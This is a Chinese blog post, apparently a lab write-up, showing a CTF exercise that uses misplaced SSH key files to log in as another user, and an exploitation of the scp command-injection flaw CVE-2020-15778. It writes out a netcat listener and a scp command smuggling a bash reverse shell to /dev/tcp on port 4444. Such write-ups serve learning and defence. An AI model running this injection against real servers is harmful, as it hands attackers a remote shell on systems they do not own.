ssh免密登录于linux系统上的使用及其漏洞

ssh免密登录于linux系统上用于渗透的使用及其漏洞

免密登录使用教程

参考博文

渗透实验

通过操作机终端使用ssh登录靶机的test用户(密码123),test用户目录中存放了可用于ssh免密码登录靶机的flag用户所必要的文件,使用这些文件登录靶机的flag用户,flag存在于flag用户目录中。

首先解析题目并登录靶机,由于题目坑爹,其实所需文件在flag目录下,所以我们把它复制到自己的目录下

在这里插入图片描述在这里插入图片描述
我们发现其内是一个压缩包,在/home/test/.ssh/路径下解压它,得到免密登录所需的文件,然后直接ssh免密登录flag@localhost用户得到flag
在这里插入图片描述

CVE漏洞CVE-2020-15778

源博文
首先对目标任意端口打开侦听,这里随便选择一个4444端口nc -lvvp 4444
使用ssh免密登录利用scp进行shell命令注入

scp test.txt username@x.x.x.x:'`bash -i >& /dev/tcp/x.x.x.x/4444 0>&1` /tmp/test.txt'

其中x.x.x.x为目标ip,发送文件与接收文件目录都不重要,重要的是中间的bash指令bash -i >& /dev/tcp/x.x.x.x/4444 0>&1可以创建并返回一个交互式shell

在这里插入图片描述
如图我们在nc监听处得到了一个交互shell

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

winnower-sliff

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值